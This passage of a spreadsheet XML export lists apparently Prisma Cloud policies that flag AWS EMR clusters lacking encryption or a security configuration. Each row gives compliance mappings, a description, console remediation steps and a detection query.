v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, NIST 800-53 Rev4, ITSG-33, NIST CSF v2.0, CDC NIST 800-53 Rev4, Risk Management in Technology (RMiT), MLPS 2.0, NIST 800-53 Rev4, ISO/IEC 27018:2019, CRI Profile v2.0, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, TX-RAMP Level 2, HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, CRI Profile v1.2.1, PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1916" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1916" s="2" t="inlineStr"/>
      <c r="D1916" t="inlineStr"/>
      <c r="E1916" t="inlineStr"/>
      <c r="F1916" t="inlineStr"/>
      <c r="G1916" t="b">
        <v>0</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1916" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1916" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not configured with CSE CMK for data at rest encryption (Amazon S3 with EMRFS)</t>
        </is>
      </c>
      <c r="L1916" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1916" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1916" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1916" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1916" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1916" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1916" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1916" t="inlineStr"/>
      <c r="T1916" t="b">
        <v>0</v>
      </c>
      <c r="U1916" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1916" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1916" t="inlineStr">
        <is>
          <t>This policy identifies EMR clusters which are not configured with Client Side Encryption with Customer Master Keys(CSE CMK) for data at rest encryption of Amazon S3 with EMRFS. As a best practice, use Customer Master Keys (CMK) to encrypt the data in your EMR cluster and ensure full control over your data.</t>
        </is>
      </c>
      <c r="X1916" t="inlineStr">
        <is>
          <t>1. Log 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For encryption At Rest click the checkbox for 'Enable at-rest encryption for EMRFS data in Amazon S3'.
8. From the dropdown 'Default encryption mode’ select 'CSE-Custom'. Follow below link for configuration steps.
https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-encryption-enable.html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you the new cluster is set up verify its working and terminate the source cluster in order to stop incurring charges for it.
16. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted
17. Click on the 'Terminate' button from the top menu.
18. On the 'Terminate clusters' pop-up, click 'Terminate'.</t>
        </is>
      </c>
      <c r="Y1916" t="inlineStr"/>
      <c r="Z1916" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' as X; config from cloud.resource where api.name = 'aws-emr-security-configuration' as Y; filter '($.X.status.state does not contain TERMINATING) and ($.X.securityConfiguration contains $.Y.name) and ($.Y.EncryptionConfiguration.EnableAtRestEncryption is true) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.S3EncryptionConfiguration exists) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.S3EncryptionConfiguration.EncryptionMode contains CSE) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.S3EncryptionConfiguration.EncryptionMode does not contain Custom)' ; show X;</t>
        </is>
      </c>
      <c r="AA1916" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1916" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1916" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-421</t>
        </is>
      </c>
      <c r="AD1916" t="b">
        <v>1</v>
      </c>
      <c r="AE1916" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1916" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>c5569c38-be41-45d9-bb79-f483ab3ec2ce</t>
        </is>
      </c>
      <c r="AI1916" t="inlineStr">
        <is>
          <t>bda19c3b-00b2-437a-bc01-27708b62ed7b</t>
        </is>
      </c>
      <c r="AJ1916" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1916" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1917">
      <c r="A1917" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], PCI DSS v3.2.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), kashan ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), NIST CSF, ITSG-33, HITRUST CSF v.11.2.0, Fedramp (Moderate), CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, CRI Profile v2.0, SOC 2, CRI Profile v1.2.1, CDC NIST 800-53 Rev4, Copy of CIS Controls v8, NIST 800-53 Rev 5, NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, ISO 27002:2022, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, Risk Management in Technology (RMiT), ISO/IEC 27018:2019, MAS TRM 2021, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), DORA, MLPS 2.0 (Level 3), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, FFIEC, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, MLPS 2.0, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, CIS Controls v8, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, NIST 800-53 Rev4, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B1917" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1917" s="2" t="inlineStr"/>
      <c r="D1917" t="inlineStr"/>
      <c r="E1917" t="inlineStr"/>
      <c r="F1917" t="inlineStr"/>
      <c r="G1917" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1917" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1917" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not enabled with data encryption in transit</t>
        </is>
      </c>
      <c r="L1917" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1917" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1917" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1917" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1917" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1917" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R1917" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S1917" t="inlineStr"/>
      <c r="T1917" t="b">
        <v>0</v>
      </c>
      <c r="U1917" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1917" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1917" t="inlineStr">
        <is>
          <t>This policy identifies AWS EMR clusters which are not enabled with data encryption in transit. It is highly recommended to implement in-transit encryption in order to protect data from unauthorized access as it travels through the network, between clients and storage server. Enabling data encryption in-transit helps prevent unauthorized users from reading sensitive data between your EMR clusters and their associated storage systems.</t>
        </is>
      </c>
      <c r="X1917" t="inlineStr">
        <is>
          <t>1.Login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Under 'Data in transit encryption', check the box 'Enable in-transit encryption'.
8. From the dropdown of 'TLS certificate provider’ select the appropriate certificate provider type and follow below link to create them.
  Reference: https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-encryption-enable.html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you the new cluster is set up verify its working and terminate the source cluster in order to stop incurring charges for it.
16. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted.
17. Click on the 'Terminate' button from the top menu.
18. On the 'Terminate clusters' pop-up, click 'Terminate'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-351
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-351</t>
        </is>
      </c>
      <c r="Y1917" t="inlineStr"/>
      <c r="Z1917" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' as X; config from cloud.resource where api.name = 'aws-emr-security-configuration' as Y; filter '($.X.status.state does not contain TERMINATING) and ($.X.securityConfiguration equals $.Y.name) and ($.Y.EncryptionConfiguration.EnableInTransitEncryption is false)' ; show X;
{"category":"General","resourceTypes":["aws_emr_security_configuration"]}</t>
        </is>
      </c>
      <c r="AA1917" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1917" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1917" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-424-CKV_AWS_351</t>
        </is>
      </c>
      <c r="AD1917" t="b">
        <v>1</v>
      </c>
      <c r="AE1917" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1917" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>4a22f0e7-c3ea-46cc-a255-c155921e7b1f</t>
        </is>
      </c>
      <c r="AI1917" t="inlineStr">
        <is>
          <t>4abb8f29-af45-4fbb-885c-a2f7039dfc88</t>
        </is>
      </c>
      <c r="AJ1917" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1917" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1918">
      <c r="A1918" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2024.2, ITSG-33, NIST SP 800-172, MLPS 2.0 (Level 3), ISO/IEC 27017:2015, CSA CCM v.4.0.1, TX-RAMP Level 2, APRA (CPS 234) Information Security, HITRUST CSF v.9.6.0, Fedramp (Low), MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, NIST 800-53 Rev 5, ISO/IEC 27017:2015, GDPR, Telecommunications Security Act - TSA, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Fedramp (Moderate), CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, SOC 2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, HIPAA, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CCPA 2018, PIPEDA, jneytchev-fedramp-low, CIS Controls v8.1, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), CyberSecurity Law of the People's Republic of China, NIST SP 800-171 Revision 2, MLPS 2.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v7.1, NIST 800-53 Rev4, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Brazilian Data Protection Law (LGPD)</t>
        </is>
      </c>
      <c r="B1918" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1918" s="2" t="inlineStr"/>
      <c r="D1918" t="inlineStr"/>
      <c r="E1918" t="inlineStr"/>
      <c r="F1918" t="inlineStr"/>
      <c r="G1918" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1918" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1918" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not configured with security configuration</t>
        </is>
      </c>
      <c r="L1918" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1918" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1918" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1918" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1918" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1918" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R1918" t="inlineStr">
        <is>
          <t>CM-06</t>
        </is>
      </c>
      <c r="S1918" t="inlineStr"/>
      <c r="T1918" t="b">
        <v>0</v>
      </c>
      <c r="U1918" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1918" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1918" t="inlineStr">
        <is>
          <t>This policy identifies EMR clusters which are not configured with security configuration. With Amazon EMR release version 4.8.0 or later, you can use security configurations to configure data encryption, Kerberos authentication, and Amazon S3 authorization for EMRFS.</t>
        </is>
      </c>
      <c r="X1918" t="inlineStr">
        <is>
          <t>1. Log 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Follow below link to configure a security configuration
https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-create-security-configuration.html
8. Click on 'Create' button
9. On the left menu of EMR dashboard Click 'Clusters'
10. Select the EMR cluster for which the alert has been generated and click on the 'Clone' button from the top menu.
11. In the Cloning popup, choose 'Yes' and Click 'Clone'
12. On the Create Cluster page, in the Security Options section, click on 'security configuration'
13. From the 'Security configuration' drop down select the name of the security configuration created at step 4 to step 8, click 'Create Cluster'.
14. Once you the new cluster is set up verify its working and terminate the source cluster in order to stop incurring charges for it
15. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted
16. Click on the 'Terminate' button from the top menu
17. On the 'Terminate clusters' pop-up, click 'Terminate' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-55
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-55</t>
        </is>
      </c>
      <c r="Y1918" t="inlineStr"/>
      <c r="Z1918" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-emr-describe-cluster' AND json.rule =  'status.state does not contain TERMINATING and securityConfiguration does not exist'
{"category":"General","resourceTypes":["aws_emr_cluster"]}</t>
        </is>
      </c>
      <c r="AA1918" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1918" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1918" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-419-CKV2_AWS_55</t>
        </is>
      </c>
      <c r="AD1918" t="b">
        <v>1</v>
      </c>
      <c r="AE1918" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1918" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>fdb20dde-b829-4385-b6b8-eb29f6379e8c</t>
        </is>
      </c>
      <c r="AI1918" t="inlineStr">
        <is>
          <t>d1fae1fd-5d39-48c4-9583-e08b1d80244d</t>
        </is>
      </c>
      <c r="AJ1918" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1918" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1919">
      <c r="A1919" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, Fedramp (Moderate), RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, Risk Management in Technology (RMiT), MLPS 2.0, ISO/IEC 27018:2019, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev4, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1919" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1919" s="2" t="inlineStr"/>
      <c r="D1919" t="inlineStr"/>
      <c r="E1919" t="inlineStr"/>
      <c r="F1919" t="inlineStr"/>
      <c r="G1919" t="b">
        <v>1</v>
      </c>
      <c r="H19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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1919" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1919" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not enabled with local disk encryption</t>
        </is>
      </c>
      <c r="L1919" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1919" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1919" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1919" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1919" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1919" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1919" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1919" t="inlineStr"/>
      <c r="T1919" t="b">
        <v>0</v>
      </c>
      <c r="U1919" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1919" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1919" t="inlineStr">
        <is>
          <t>This policy identifies AWS EMR clusters that are not enabled with local disk encryption. Applications using the local file system on each cluster instance for intermediate data throughout workloads, where data could be spilled to disk when it overflows memory. With Local disk encryption at place, data at rest can be protected.</t>
        </is>
      </c>
      <c r="X1919" t="inlineStr">
        <is>
          <t>1. Login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Under 'Local disk encryption', check the box 'Enable at-rest encryption for local disks'.
8. Select the appropriate Key provider type from the  'Key provider type' dropdown list.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the new cluster is set up verify its working and terminate the source cluster.
16. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted.
17. Click on the 'Terminate' button from the top menu.
18. On the 'Terminate clusters' pop-up, click 'Terminate'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-349
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-349</t>
        </is>
      </c>
      <c r="Y1919" t="inlineStr"/>
      <c r="Z1919" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' as X; config from cloud.resource where api.name = 'aws-emr-security-configuration' as Y; filter '($.X.status.state does not contain TERMINATING) and ($.X.securityConfiguration contains $.Y.name) and ($.Y.EncryptionConfiguration.EnableAtRestEncryption is true) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.LocalDiskEncryptionConfiguration does not exist)' ; show X;
{"category":"General","resourceTypes":["aws_emr_security_configuration"]}</t>
        </is>
      </c>
      <c r="AA1919" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1919" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1919" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-422-CKV_AWS_349</t>
        </is>
      </c>
      <c r="AD1919" t="b">
        <v>1</v>
      </c>
      <c r="AE1919" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1919" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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19" t="inlineStr">
        <is>
          <t>271423dc-295f-40fb-8743-ec07f58e8761</t>
        </is>
      </c>
      <c r="AI1919" t="inlineStr">
        <is>
          <t>4b0c9ff6-dd18-4a02-9587-a387776a9a63</t>
        </is>
      </c>
      <c r="AJ1919" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1919" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1920">
      <c r="A1920" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, CIS Controls v7.1, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, CHC HITRUST CSF v.9.6.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, Copy of CIS Controls v8, ITSG-33, CRI Profile v2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B1920" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1920" s="2" t="inlineStr"/>
      <c r="D1920" t="inlineStr"/>
      <c r="E1920" t="inlineStr"/>
      <c r="F1920" t="inlineStr"/>
      <c r="G1920" t="b">
        <v>1</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1920" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
